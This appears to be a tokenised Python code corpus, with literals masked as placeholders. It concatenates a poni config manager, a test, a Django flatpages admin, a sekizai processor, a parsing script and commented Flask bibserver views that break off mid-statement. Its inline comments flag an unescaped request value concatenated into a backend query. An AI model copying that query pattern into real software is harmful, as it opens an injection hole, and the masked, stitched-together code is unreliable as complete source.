full_path = property ( get_full_path , doc = "<STR_LIT>" ) <EOL> full_name = full_path <EOL> def __hash__ ( self ) : <EOL> return hash ( self . full_name ) <EOL> def __eq__ ( self , other ) : <EOL> return ( ( self . name == other . name ) and ( self . node . 
name == other . node . name ) ) <EOL> def get_plugin ( self ) : <EOL> if self . plugin : <EOL> return self . plugin <EOL> parent_config_name = self . get ( "<STR_LIT>" ) <EOL> if not parent_config_name : <EOL> return None <EOL> parent_conf_node , parent_config = self . node . confman . get_config ( <EOL> parent_config_name ) <EOL> return parent_config . get_plugin ( ) <EOL> def load_settings_layer ( self , file_name ) : <EOL> try : <EOL> return json . load ( open ( os . path . join ( self . settings_dir , file_name ) ) ) <EOL> except ( IOError , OSError ) : <EOL> return { } <EOL> def save_settings_layer ( self , file_name , layer ) : <EOL> if not os . path . exists ( self . settings_dir ) : <EOL> os . mkdir ( self . settings_dir ) <EOL> full_path = os . path . join ( self . settings_dir , file_name ) <EOL> util . json_dump ( layer , full_path ) <EOL> self . settings . reload ( ) <EOL> def get_settings_dirs ( self ) : <EOL> parent_config_name = self . get ( "<STR_LIT>" ) <EOL> if parent_config_name : <EOL> parent_config_node , parent_config = self . node . confman . get_config ( parent_config_name ) <EOL> for item in parent_config . get_settings_dirs ( ) : <EOL> yield item <EOL> yield self . full_name , self . settings_dir <EOL> def saveable ( self ) : <EOL> return self . items ( ) <EOL> def showable ( self ) : <EOL> dont_show = set ( [ "<STR_LIT>" , "<STR_LIT:name>" , "<STR_LIT:path>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> for k , v in sorted ( self . items ( ) ) : <EOL> if k not in dont_show : <EOL> yield k , v <EOL> def collect ( self , manager , node , top_config = None ) : <EOL> top_config = top_config or self <EOL> plugin_path = os . path . join ( self . path , PLUGIN_FILE ) <EOL> if not os . path . exists ( plugin_path ) : <EOL> return <EOL> plugin_key = ( manager , self , node , top_config ) <EOL> plugin = g_plugin_cache . get ( plugin_key ) <EOL> if plugin : <EOL> return plugin <EOL> cache_key = ( plugin_path , os . stat ( plugin_path ) . 
st_mtime ) <EOL> module = g_plugin_module_cache . get ( cache_key ) <EOL> if not module : <EOL> module = imp . load_source ( <EOL> "<STR_LIT>" % len ( g_plugin_module_cache ) , <EOL> plugin_path ) <EOL> g_plugin_module_cache [ cache_key ] = module <EOL> plugin = module . PlugIn ( manager , self , node , top_config ) <EOL> plugin . add_actions ( ) <EOL> plugin . add_all_controls ( ) <EOL> top_config . plugin = plugin <EOL> g_plugin_cache [ plugin_key ] = plugin <EOL> def collect_parents ( self , manager , node , top_config = None ) : <EOL> top_config = top_config or self <EOL> parent_name = self . get ( "<STR_LIT>" ) <EOL> if not parent_name : <EOL> return <EOL> matches = list ( self . node . confman . find_config ( parent_name , <EOL> full_match = True ) ) <EOL> if len ( matches ) == <NUM_LIT:0> : <EOL> raise errors . Error ( "<STR_LIT>" % ( <EOL> self . full_name , parent_name ) ) <EOL> elif len ( matches ) > <NUM_LIT:1> : <EOL> names = ( c . full_name for pn , c in matches ) <EOL> raise errors . Error ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( <EOL> self . full_name , parent_name , "<STR_LIT:U+002CU+0020>" . join ( names ) ) ) <EOL> parent_conf_node , parent_conf = matches [ <NUM_LIT:0> ] <EOL> parent_conf . collect ( manager , node , top_config = top_config ) <EOL> class Node ( Item ) : <EOL> def __init__ ( self , confman , system , name , item_dir , extra = None ) : <EOL> Item . __init__ ( self , "<STR_LIT>" , system , name , item_dir , <EOL> os . path . join ( item_dir , NODE_CONF_FILE ) , extra ) <EOL> self . confman = confman <EOL> self . _remotes = { } <EOL> self . config_cache = { } <EOL> self . update ( json . load ( open ( self . conf_file ) ) ) <EOL> def addr ( self , network = None ) : <EOL> """<STR_LIT>""" <EOL> network = network or "<STR_LIT>" <EOL> key = ( self . path , network ) <EOL> cached = self . confman . node_addr_cache . 
get ( key ) <EOL> if cached is not None : <EOL> return cached <EOL> if network == "<STR_LIT>" : <EOL> default = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> else : <EOL> default = [ "<STR_LIT>" . format ( network ) , "<STR_LIT>" ] <EOL> addr_map = self . get_tree_property ( "<STR_LIT>" , { } ) <EOL> addr_prop_list = addr_map . get ( network , addr_map . get ( "<STR_LIT:default>" , default ) ) <EOL> for addr_prop_name in addr_prop_list : <EOL> item = self <EOL> for part in addr_prop_name . split ( "<STR_LIT:.>" ) : <EOL> item = item . get ( part ) <EOL> if not isinstance ( item , ( dict , string_types , type ( None ) ) ) : <EOL> raise errors . InvalidProperty ( <EOL> "<STR_LIT>" % ( <EOL> self . name , type ( item ) , addr_prop_name ) ) <EOL> elif item is None : <EOL> break <EOL> if item is not None : <EOL> self . confman . node_addr_cache [ key ] = item <EOL> return item <EOL> raise errors . MissingProperty ( <EOL> "<STR_LIT>" % ( <EOL> self . name , network , <EOL> "<STR_LIT:U+002CU+0020>" . join ( repr ( a ) for a in addr_prop_list ) ) ) <EOL> def cleanup ( self ) : <EOL> for remote in self . _remotes . values ( ) : <EOL> remote . close ( ) <EOL> def get_remote ( self , override = None ) : <EOL> method = override or self . get_tree_property ( "<STR_LIT>" , None ) <EOL> remote = self . _remotes . get ( method ) <EOL> if not remote : <EOL> remote = rcontrol_all . get_remote ( self , method ) <EOL> self . _remotes [ method ] = remote <EOL> return remote <EOL> def add_config ( self , config , parent = None , copy_dir = None ) : <EOL> config_dir = os . path . join ( self . path , CONFIG_DIR , config ) <EOL> if os . path . exists ( config_dir ) : <EOL> raise errors . UserError ( <EOL> "<STR_LIT>" % ( self . name , config ) ) <EOL> if copy_dir : <EOL> try : <EOL> shutil . copytree ( copy_dir , config_dir , symlinks = True ) <EOL> except ( IOError , OSError ) as error : <EOL> raise errors . Error ( "<STR_LIT>" % ( <EOL> error . __class__ . 
__name__ , error ) ) <EOL> else : <EOL> os . makedirs ( config_dir ) <EOL> conf_file = os . path . join ( config_dir , CONFIG_CONF_FILE ) <EOL> conf = { } <EOL> if parent : <EOL> conf [ "<STR_LIT>" ] = parent <EOL> util . json_dump ( conf , conf_file ) <EOL> settings_dir = os . path . join ( config_dir , SETTINGS_DIR ) <EOL> if not os . path . exists ( settings_dir ) : <EOL> os . mkdir ( settings_dir ) <EOL> def remove_config ( self , config ) : <EOL> config_dir = os . path . join ( self . path , CONFIG_DIR , config ) <EOL> if not os . path . exists ( config_dir ) : <EOL> raise errors . UserError ( <EOL> "<STR_LIT>" % ( self . name , config ) ) <EOL> shutil . rmtree ( config_dir ) <EOL> def iter_configs ( self ) : <EOL> config_dir = os . path . join ( self . path , CONFIG_DIR ) <EOL> dirs = [ ] <EOL> if os . path . exists ( config_dir ) : <EOL> for dir_entry in os . listdir ( config_dir ) : <EOL> config_path = os . path . join ( config_dir , dir_entry ) <EOL> if os . path . isdir ( config_path ) : <EOL> dirs . append ( config_path ) <EOL> for config_path in dirs : <EOL> conf = self . config_cache . get ( config_path ) <EOL> if conf is None : <EOL> conf = Config ( self , os . path . basename ( config_path ) , config_path ) <EOL> self . config_cache [ config_path ] = conf <EOL> yield conf <EOL> def iter_all_configs ( self , handled = None ) : <EOL> handled = handled or set ( ) <EOL> for conf in self . iter_configs ( ) : <EOL> if conf . name not in handled : <EOL> handled . add ( conf . name ) <EOL> yield conf <EOL> parent_name = self . get ( "<STR_LIT>" ) <EOL> if parent_name : <EOL> parent_path = os . path . join ( self . confman . system_root , parent_name ) <EOL> parent_node = self . confman . get_node ( parent_path , self . system ) <EOL> for conf in parent_node . iter_all_configs ( handled = handled ) : <EOL> yield conf <EOL> def collect ( self , manager ) : <EOL> for conf in self . iter_configs ( ) : <EOL> conf . 
collect ( manager , self ) <EOL> def collect_parents ( self , manager , node = None ) : <EOL> node = node or self <EOL> parent_name = self . get ( "<STR_LIT>" ) <EOL> if parent_name : <EOL> parent_path = os . path . join ( self . confman . system_root , parent_name ) <EOL> parent_node = self . confman . get_node ( parent_path , self . system ) <EOL> for conf in parent_node . iter_configs ( ) : <EOL> conf . collect ( manager , node ) <EOL> parent_node . collect_parents ( manager , node ) <EOL> for conf in self . iter_configs ( ) : <EOL> conf . collect_parents ( manager , node ) <EOL> class System ( Item ) : <EOL> def __init__ ( self , system , name , system_path , sub_count , extra = None ) : <EOL> Item . __init__ ( self , "<STR_LIT>" , system , name , system_path , <EOL> os . path . join ( system_path , SYSTEM_CONF_FILE ) , extra ) <EOL> self [ "<STR_LIT>" ] = sub_count <EOL> try : <EOL> self . update ( json . load ( open ( self . conf_file ) ) ) <EOL> except IOError : <EOL> pass <EOL> class PathPyCompat ( str ) : <EOL> """<STR_LIT>""" <EOL> def __div__ ( self , other ) : <EOL> return os . path . join ( self , other ) <EOL> class ConfigMan ( object ) : <EOL> def __init__ ( self , root_dir , must_exist = True ) : <EOL> self . root_dir = PathPyCompat ( root_dir ) <EOL> self . system_root = os . path . join ( self . root_dir , "<STR_LIT>" ) <EOL> self . config_path = os . path . join ( self . root_dir , REPO_CONF_FILE ) <EOL> self . node_cache = { } <EOL> self . node_addr_cache = { } <EOL> self . find_cache = { } <EOL> self . find_config_cache = { } <EOL> self . _cache_reset_counter = g_cache_reset_counter <EOL> if must_exist : <EOL> conf = self . load_config ( ) <EOL> self . apply_library_paths ( conf . get ( "<STR_LIT>" , { } ) ) <EOL> self . vc = vc . create_vc ( self . root_dir ) <EOL> def dump_stats ( self ) : <EOL> return dict ( <EOL> node_cache = len ( self . node_cache ) , <EOL> find_cache = len ( self . find_cache ) , <EOL> find_config_cache = len ( self . 
find_config_cache ) , <EOL> ) <EOL> def reset_cache ( self ) : <EOL> self . node_cache = { } <EOL> self . node_addr_cache = { } <EOL> self . find_cache = { } <EOL> self . find_config_cache = { } <EOL> global g_cache_reset_counter <EOL> g_cache_reset_counter += <NUM_LIT:1> <EOL> self . _cache_reset_counter = g_cache_reset_counter <EOL> def apply_library_paths ( self , path_dict ) : <EOL> """<STR_LIT>""" <EOL> for lib_path in path_dict . values ( ) : <EOL> if not os . path . isabs ( lib_path ) : <EOL> lib_path = os . path . join ( self . root_dir , lib_path ) <EOL> if not lib_path in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , lib_path ) <EOL> def init_repo ( self ) : <EOL> if os . path . exists ( self . config_path ) : <EOL> raise errors . Error ( "<STR_LIT>" % ( <EOL> self . root_dir ) ) <EOL> try : <EOL> if not os . path . exists ( self . system_root ) : <EOL> os . makedirs ( self . system_root ) <EOL> util . json_dump ( { } , self . config_path ) <EOL> with open ( os . path . join ( self . root_dir , "<STR_LIT>" ) , "<STR_LIT:wb>" ) as f : <EOL> f . write ( codecs . decode ( codecs . decode ( b"""<STR_LIT>""" , "<STR_LIT>" ) , "<STR_LIT>" ) ) <EOL> except ( OSError , IOError ) as error : <EOL> raise errors . RepoError ( "<STR_LIT>" % ( <EOL> self . root_dir , error . __class__ . __name__ , error ) ) <EOL> def set_library_path ( self , name , lib_path ) : <EOL> conf = self . load_config ( ) <EOL> lib_path = str ( lib_path ) <EOL> libpath = conf . setdefault ( "<STR_LIT>" , { } ) <EOL> old_path = libpath . get ( name ) <EOL> libpath [ name ] = lib_path <EOL> sys_lib_path = lib_path if os . path . isabs ( lib_path ) else os . path . join ( self . root_dir , lib_path ) <EOL> if sys_lib_path not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , sys_lib_path ) <EOL> if old_path and old_path in sys . path : <EOL> sys . path . remove ( old_path ) <EOL> self . save_config ( conf ) <EOL> def load_config ( self ) : <EOL> try : <EOL> return dict ( json . 
load ( open ( self . config_path ) ) ) <EOL> except Exception as error : <EOL> raise errors . RepoError ( <EOL> "<STR_LIT>" % ( <EOL> self . root_dir , error . __class__ . __name__ , error ) ) <EOL> def save_config ( self , conf ) : <EOL> util . json_dump ( conf , self . config_path ) <EOL> def cleanup ( self ) : <EOL> for node in self . node_cache . values ( ) : <EOL> node . cleanup ( ) <EOL> def get_system_dir ( self , name , must_exist = True ) : <EOL> return ensure_dir ( "<STR_LIT>" , self . system_root , name , must_exist ) <EOL> def get_node_dir ( self , system , name , must_exist = True ) : <EOL> return ensure_dir ( "<STR_LIT>" , self . get_system_dir ( system ) , name , <EOL> must_exist ) <EOL> def create_system ( self , name ) : <EOL> system_dir = self . get_system_dir ( name , must_exist = False ) <EOL> os . makedirs ( system_dir ) <EOL> spec_file = os . path . join ( system_dir , SYSTEM_CONF_FILE ) <EOL> util . json_dump ( { } , spec_file ) <EOL> return system_dir <EOL> def system_exists ( self , name ) : <EOL> return os . path . exists ( os . path . join ( self . system_root , name ) ) <EOL> def create_node ( self , node , host = None , parent_node_name = None , <EOL> copy_props = None ) : <EOL> system_dir , node_name = os . path . split ( node ) <EOL> if not self . system_exists ( system_dir ) : <EOL> self . create_system ( system_dir ) <EOL> node_dir = self . get_node_dir ( system_dir , node_name , must_exist = False ) <EOL> os . makedirs ( node_dir ) <EOL> spec_file = os . path . join ( node_dir , NODE_CONF_FILE ) <EOL> if copy_props and parent_node_name : <EOL> parent_node_conf = os . path . join ( self . system_root , parent_node_name , <EOL> NODE_CONF_FILE ) <EOL> spec = json . load ( open ( parent_node_conf ) ) <EOL> else : <EOL> spec = { } <EOL> spec [ "<STR_LIT:host>" ] = host or "<STR_LIT>" <EOL> if parent_node_name : <EOL> spec [ "<STR_LIT>" ] = parent_node_name <EOL> util . 
json_dump ( spec , spec_file ) <EOL> def get_node ( self , node_path , system , extra = None , name = None ) : <EOL> extra = extra or { } <EOL> node = self . node_cache . get ( node_path ) <EOL> if not node : <EOL> name = name or node_path [ len ( self . system_root ) + <NUM_LIT:1> : ] <EOL> node = Node ( self , system , name , node_path , extra = extra ) <EOL> self . node_cache [ node_path ] = node <EOL> return node <EOL> def get_system ( self , parent_system , name , current , level , extra ) : <EOL> key = ( "<STR_LIT>" , parent_system , name , current , level , tuple ( extra . items ( ) ) ) <EOL> system = self . node_cache . get ( key ) <EOL> if not system : <EOL> system = System ( parent_system , name , current , level , extra = extra ) <EOL> self . node_cache [ key ] = system <EOL> return system <EOL> def get_config ( self , pattern ) : <EOL> configs = list ( self . find_config ( pattern , all_configs = True , <EOL> full_match = True ) ) <EOL> if len ( configs ) == <NUM_LIT:0> : <EOL> raise errors . Error ( "<STR_LIT>" % ( pattern ) ) <EOL> elif len ( configs ) > <NUM_LIT:1> : <EOL> raise errors . Error ( "<STR_LIT>" % ( <EOL> pattern , "<STR_LIT:U+002CU+0020>" . join ( c . full_name for cn , c in configs ) ) ) <EOL> return configs [ <NUM_LIT:0> ] <EOL> def find_config ( self , pattern , all_configs = False , full_match = False ) : <EOL> key = ( pattern , all_configs , full_match ) <EOL> results = self . find_config_cache . get ( key ) <EOL> if not results : <EOL> results = list ( self . _find_config ( pattern , all_configs = all_configs , full_match = full_match ) ) <EOL> self . find_config_cache [ key ] = results <EOL> return results <EOL> def _find_config ( self , pattern , all_configs = False , full_match = False ) : <EOL> comparison = ConfigMatch ( pattern , full_match = full_match ) <EOL> for node in self . find ( "<STR_LIT:.>" ) : <EOL> if not comparison . match_node ( node . name ) : <EOL> continue <EOL> if all_configs : <EOL> find_method = node . 
iter_all_configs <EOL> else : <EOL> find_method = node . iter_configs <EOL> for conf in find_method ( ) : <EOL> if comparison . match_config ( conf . name ) : <EOL> yield node , conf <EOL> def find ( self , pattern , nodes = True , <EOL> systems = False , depth = None , full_match = False , exclude = None ) : <EOL> key = ( pattern , nodes , systems , tuple ( depth or [ ] ) , full_match , tuple ( exclude or [ ] ) ) <EOL> results = self . find_cache . get ( key ) <EOL> if not results : <EOL> results = list ( self . _find ( pattern , nodes = nodes , systems = systems , depth = depth , full_match = full_match , exclude = exclude ) ) <EOL> self . find_cache [ key ] = results <EOL> return results <EOL> def _find ( self , pattern , current = None , system = None , nodes = True , <EOL> systems = False , curr_depth = <NUM_LIT:0> , extra = None , depth = None , <EOL> full_match = False , exclude = None ) : <EOL> depth = depth or [ ] <EOL> extra = extra or { } <EOL> if not callable ( exclude ) : <EOL> if exclude : <EOL> exclude = re . compile ( exclude ) . search <EOL> else : <EOL> exclude = lambda name : False <EOL> pattern = pattern or "<STR_LIT>" <EOL> if isinstance ( pattern , string_types ) : <EOL> if full_match and not pattern . endswith ( "<STR_LIT:$>" ) : <EOL> pattern += "<STR_LIT:$>" <EOL> pattern = re . compile ( pattern or "<STR_LIT>" ) <EOL> match_op = pattern . match if full_match else pattern . search <EOL> current = current or self . system_root <EOL> node_conf_file = os . path . join ( current , NODE_CONF_FILE ) <EOL> name = current [ len ( self . system_root ) + <NUM_LIT:1> : ] <EOL> ok_depth = ( not depth ) or ( curr_depth in depth ) <EOL> if os . path . exists ( node_conf_file ) : <EOL> if nodes and match_op ( name ) and ok_depth and not exclude ( name ) : <EOL> yield self . get_node ( current , system , extra = extra ) <EOL> else : <EOL> subdirs = [ os . path . join ( current , entry ) for entry in os . 
listdir ( current ) ] <EOL> subdirs = sorted ( entry for entry in subdirs if os . path . isdir ( entry ) ) <EOL> system = self . get_system ( system , name , current , len ( subdirs ) , extra ) <EOL> if ( systems and ( current != self . system_root ) and ok_depth <EOL> and match_op ( name ) ) and not exclude ( name ) : <EOL> yield system <EOL> for sub_index , subdir in enumerate ( subdirs ) : <EOL> sub_depth = curr_depth + <NUM_LIT:1> <EOL> extra = dict ( index = sub_index , depth = sub_depth ) <EOL> for result in self . _find ( pattern , current = subdir , system = system , <EOL> nodes = nodes , systems = systems , <EOL> curr_depth = sub_depth , extra = extra , <EOL> exclude = exclude , <EOL> depth = depth , full_match = full_match ) : <EOL> yield result </s>
<s> from poni import util <EOL> import os <EOL> def test_dir_stats ( ) : <EOL> poni_src_dir = os . path . dirname ( os . path . dirname ( __file__ ) ) <EOL> stats = util . dir_stats ( poni_src_dir ) <EOL> assert stats [ '<STR_LIT>' ] > <NUM_LIT:30> <EOL> assert stats [ '<STR_LIT>' ] > <NUM_LIT> <EOL> assert stats [ '<STR_LIT:path>' ] == poni_src_dir </s>
<s> from django import forms <EOL> from django . contrib import admin <EOL> from multilingual . flatpages . models import MultilingualFlatPage <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from multilingual . admin import MultilingualModelAdmin , MultilingualModelAdminForm <EOL> class MultilingualFlatpageForm ( MultilingualModelAdminForm ) : <EOL> url = forms . RegexField ( label = _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:100> , regex = r'<STR_LIT>' , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> error_message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> class Meta : <EOL> model = MultilingualFlatPage <EOL> class MultilingualFlatPageAdmin ( MultilingualModelAdmin ) : <EOL> form = MultilingualFlatpageForm <EOL> use_fieldsets = ( <EOL> ( None , { '<STR_LIT>' : ( '<STR_LIT:title>' , '<STR_LIT:url>' , '<STR_LIT>' , '<STR_LIT:content>' ) } ) , <EOL> ( _ ( '<STR_LIT>' ) , { '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) } ) , <EOL> ) <EOL> list_display = ( '<STR_LIT:url>' , '<STR_LIT:title>' ) <EOL> list_filter = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> search_fields = ( '<STR_LIT:url>' , '<STR_LIT:title>' ) <EOL> admin . site . register ( MultilingualFlatPage , MultilingualFlatPageAdmin ) </s>
<s> from collections import defaultdict <EOL> from sekizai . data import UniqueSequence <EOL> from sekizai . helpers import get_varname <EOL> def sekizai ( request = None ) : <EOL> """<STR_LIT>""" <EOL> return { get_varname ( ) : defaultdict ( UniqueSequence ) } </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import subprocess <EOL> import sys <EOL> def _parse_lines ( lines ) : <EOL> """<STR_LIT>""" <EOL> results = [ ] <EOL> acc = [ ] <EOL> for line in lines : <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> acc . append ( line ) <EOL> elif line . startswith ( "<STR_LIT:U+0020>" ) and acc : <EOL> acc . append ( line ) <EOL> else : <EOL> if acc : <EOL> for i , l in enumerate ( reversed ( acc ) ) : <EOL> if l . startswith ( "<STR_LIT>" ) : <EOL> acc [ - ( <NUM_LIT:1> + i ) ] = "<STR_LIT:*>" + l <EOL> break <EOL> results . extend ( acc ) <EOL> acc = [ ] <EOL> results . append ( line ) <EOL> return results <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> args = [ '<STR_LIT>' ] <EOL> args . extend ( sys . argv [ <NUM_LIT:1> : ] ) <EOL> p = subprocess . Popen ( args , stdin = subprocess . PIPE , stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> _ , stdout = p . communicate ( ) <EOL> if ( sys . version_info > ( <NUM_LIT:3> , <NUM_LIT:0> ) ) : <EOL> stdout = stdout . decode ( ) <EOL> result = _parse_lines ( stdout . splitlines ( ) ) <EOL> print ( "<STR_LIT:\n>" . join ( result ) ) </s>
# bibserver web front-end: Flask routes for querying, uploading, creating
# collections and notes, plus login-manager wiring.
# NOTE(review): Python 2 code (print statements, `except Exception, inst`);
# string/number literals are anonymised (<STR_LIT>/<NUM_LIT> placeholders),
# so route paths and messages are opaque here.
import os
import urllib2
import unicodedata
import httplib
import json
import subprocess
from copy import deepcopy
from datetime import datetime
from flask import Flask, jsonify, json, request, redirect, abort, make_response
from flask import render_template, flash
from flask.views import View, MethodView
from flask.ext.login import login_user, current_user
import bibserver.dao
import bibserver.util as util
import bibserver.importer
import bibserver.ingest
from bibserver.config import config
from bibserver.core import app, login_manager
from bibserver.view.account import blueprint as account
from bibserver import auth

app.register_blueprint(account, url_prefix='<STR_LIT>')


@login_manager.user_loader
def load_account_for_login_manager(userid):
    # Resolve the session user id to an Account record (None if missing).
    out = bibserver.dao.Account.get(userid)
    return out


@app.context_processor
def set_current_user():
    """<STR_LIT>"""
    # Expose `current_user` to every template render.
    return dict(current_user=current_user)


@app.before_request
def standard_authentication():
    """<STR_LIT>"""
    # Two auth paths: a trusted header (set by an upstream proxy), or an
    # API-key-style value supplied in the request parameters.
    remote_user = request.headers.get('<STR_LIT>', '<STR_LIT>')
    if remote_user:
        user = bibserver.dao.Account.get(remote_user)
        if user:
            login_user(user, remember=False)
    elif '<STR_LIT>' in request.values:
        # NOTE(review): the request value is concatenated straight into the
        # backend query string -- potential query injection; should be
        # escaped/parameterised.
        res = bibserver.dao.Account.query(q='<STR_LIT>' + request.values['<STR_LIT>'] + '<STR_LIT:">')['<STR_LIT>']['<STR_LIT>']
        if len(res) == <NUM_LIT:1>:
            user = bibserver.dao.Account.get(res[<NUM_LIT:0>]['<STR_LIT>']['<STR_LIT>'])
            if user:
                login_user(user, remember=False)


@app.route('<STR_LIT>', methods=['<STR_LIT:GET>', '<STR_LIT:POST>'])
@app.route('<STR_LIT>', methods=['<STR_LIT:GET>', '<STR_LIT:POST>'])
@app.route('<STR_LIT>', methods=['<STR_LIT:GET>', '<STR_LIT:POST>'])
def query(path='<STR_LIT>'):
    # Proxy search queries through to the DAO layer; the first path segment
    # names the DAO class to query against.
    pathparts = path.split('<STR_LIT:/>')
    subpath = pathparts[<NUM_LIT:0>]
    if subpath.lower() == '<STR_LIT>':
        abort(<NUM_LIT>)
    klass = getattr(bibserver.dao, subpath[<NUM_LIT:0>].capitalize() + subpath[<NUM_LIT:1>:])
    qs = request.query_string
    if request.method == "<STR_LIT:POST>":
        # NOTE(review): `dict(...).keys()[-1]` relies on Python 2's
        # list-returning keys(); this breaks on Python 3.
        qs += "<STR_LIT>" + json.dumps(dict(request.form).keys()[-<NUM_LIT:1>])
    if len(pathparts) > <NUM_LIT:1> and pathparts[<NUM_LIT:1>] == '<STR_LIT>':
        resp = make_response(json.dumps(klass().get_mapping()))
    else:
        resp = make_response(klass().raw_query(qs))
    resp.mimetype = "<STR_LIT:application/json>"
    return resp


@app.route('<STR_LIT>')
def content():
    # Static content page.
    return render_template('<STR_LIT>')


@app.route('<STR_LIT:/>')
def home():
    # Front page: recently modified collections plus overall totals.
    data = []
    try:
        colldata = bibserver.dao.Collection.query(sort={"<STR_LIT>": {"<STR_LIT>": "<STR_LIT>"}}, size=<NUM_LIT:20>)
        if colldata['<STR_LIT>']['<STR_LIT>'] != <NUM_LIT:0>:
            for coll in colldata['<STR_LIT>']['<STR_LIT>']:
                colln = bibserver.dao.Collection.get(coll['<STR_LIT>'])
                if colln:
                    data.append({
                        '<STR_LIT:name>': colln['<STR_LIT:label>'],
                        '<STR_LIT>': len(colln),
                        '<STR_LIT>': colln['<STR_LIT>'],
                        '<STR_LIT>': colln['<STR_LIT>'],
                        '<STR_LIT:description>': colln['<STR_LIT:description>']
                    })
    except:
        # NOTE(review): bare except silently swallows all errors (including
        # programming errors) so the front page still renders; should at
        # least log and catch a narrower exception type.
        pass
    colls = bibserver.dao.Collection.query()['<STR_LIT>']['<STR_LIT>']
    records = bibserver.dao.Record.query()['<STR_LIT>']['<STR_LIT>']
    users = bibserver.dao.Account.query()['<STR_LIT>']['<STR_LIT>']
    # NOTE(review): leftover debug print (Python 2 statement form).
    print data
    return render_template('<STR_LIT>', colldata=json.dumps(data), colls=colls, records=records, users=users)


@app.route('<STR_LIT>')
@app.route('<STR_LIT>')
def users():
    # User listing; anonymous visitors are rejected.
    if current_user.is_anonymous():
        abort(<NUM_LIT>)
    users = bibserver.dao.Account.query(sort={'<STR_LIT>': {'<STR_LIT>': '<STR_LIT>'}}, size=<NUM_LIT>)
    if users['<STR_LIT>']['<STR_LIT>'] != <NUM_LIT:0>:
        accs = [bibserver.dao.Account.get(i['<STR_LIT>']['<STR_LIT>']) for i in users['<STR_LIT>']['<STR_LIT>']]
        # `users` is rebound from the raw query result to a display list.
        users = []
        for acc in accs:
            user = {"<STR_LIT>": len(acc.collections), "<STR_LIT>": acc["<STR_LIT>"]}
            try:
                user['<STR_LIT>'] = acc['<STR_LIT>']
                user['<STR_LIT:description>'] = acc['<STR_LIT:description>']
            except:
                # Optional profile fields; absence is fine.
                pass
            users.append(user)
    if util.request_wants_json():
        resp = make_response(json.dumps(users, sort_keys=True, indent=<NUM_LIT:4>))
        resp.mimetype = "<STR_LIT:application/json>"
        return resp
    else:
        return render_template('<STR_LIT>', users=users)


class UploadView(MethodView):
    # Ticketed upload of a source URL, file, or raw JSON body for ingest.
    def get(self):
        if not auth.collection.create(current_user, None):
            flash('<STR_LIT>')
            return redirect('<STR_LIT>')
        if request.values.get("<STR_LIT:source>") is not None:
            # Allow GET-with-params to behave like a POST submission.
            return self.post()
        return render_template('<STR_LIT>',
            parser_plugins=bibserver.ingest.get_plugins().values())

    def post(self):
        if not auth.collection.create(current_user, None):
            abort(<NUM_LIT>)
        try:
            if not request.values.get('<STR_LIT>', None):
                flash('<STR_LIT>')
                return redirect('<STR_LIT>')
            # Must have at least one of: source URL, uploaded file, JSON body.
            if not request.values.get('<STR_LIT:source>', None):
                if not request.files.get('<STR_LIT>', None):
                    if not request.json:
                        flash('<STR_LIT>')
                        return redirect('<STR_LIT>')
            collection = request.values.get('<STR_LIT>')
            format = request.values.get('<STR_LIT>')
            if request.files.get('<STR_LIT>'):
                fileobj = request.files.get('<STR_LIT>')
                if not format:
                    # Infer the parser format from the uploaded filename.
                    format = bibserver.importer.findformat(fileobj.filename)
            else:
                if not format:
                    format = bibserver.importer.findformat(request.values.get("<STR_LIT:source>").strip('<STR_LIT:">'))
            ticket = bibserver.ingest.IngestTicket(owner=current_user.id,
                source_url=request.values.get("<STR_LIT:source>"),
                format=format,
                collection=request.values.get('<STR_LIT>'),
                description=request.values.get('<STR_LIT:description>'),
            )
            only_parse = request.values.get('<STR_LIT>')
            if only_parse:
                ticket['<STR_LIT>'] = True
            license = request.values.get('<STR_LIT>')
            if license: ticket['<STR_LIT>'] = license
            if request.files.get('<STR_LIT>'):
                # Uploaded file: stash the raw bytes in the ingest cache and
                # point the ticket at the cached copy.
                data = fileobj.read()
                ticket['<STR_LIT>'] = bibserver.ingest.store_data_in_cache(data)
                ticket['<STR_LIT>'] = config.get('<STR_LIT>', '<STR_LIT>') + '<STR_LIT>' % ticket.id
                ticket['<STR_LIT:state>'] = '<STR_LIT>'
            if request.json:
                # Raw JSON body: same caching treatment.
                data = request.json
                ticket['<STR_LIT>'] = bibserver.ingest.store_data_in_cache(json.dumps(data))
                ticket['<STR_LIT>'] = config.get('<STR_LIT>', '<STR_LIT>') + '<STR_LIT>' % ticket.id
                ticket['<STR_LIT:state>'] = '<STR_LIT>'
            ticket.save()
        except Exception, inst:
            # Python 2 exception syntax; re-raise under debug, otherwise
            # surface the message to the user.
            msg = str(inst)
            if app.debug or app.config['<STR_LIT>']:
                raise
            flash('<STR_LIT>' + msg)
            return render_template('<STR_LIT>')
        else:
            return redirect('<STR_LIT>' + ticket.id)


class CreateView(MethodView):
    # Create an empty collection directly (no upload step).
    def get(self):
        if not auth.collection.create(current_user, None):
            flash('<STR_LIT>')
            return redirect('<STR_LIT>')
        if request.values.get("<STR_LIT:source>") is not None:
            return self.post()
        return render_template('<STR_LIT>')

    def post(self):
        if not auth.collection.create(current_user, None):
            abort(<NUM_LIT>)
        coll = {
            '<STR_LIT:label>': request.values.get('<STR_LIT>'),
            '<STR_LIT>': request.values.get('<STR_LIT>')
        }
        i = bibserver.importer.Importer(current_user)
        collection, records = i.index(coll, {})
        return redirect(collection['<STR_LIT>'] + '<STR_LIT:/>' + collection['<STR_LIT>'])


class NoUploadOrCreate(MethodView):
    # Placeholder views used when uploads are disabled in config.
    def get(self):
        return render_template('<STR_LIT>')

    def post(self):
        abort(<NUM_LIT>)


# Wire the upload/create routes according to the config toggle.
if config["<STR_LIT>"]:
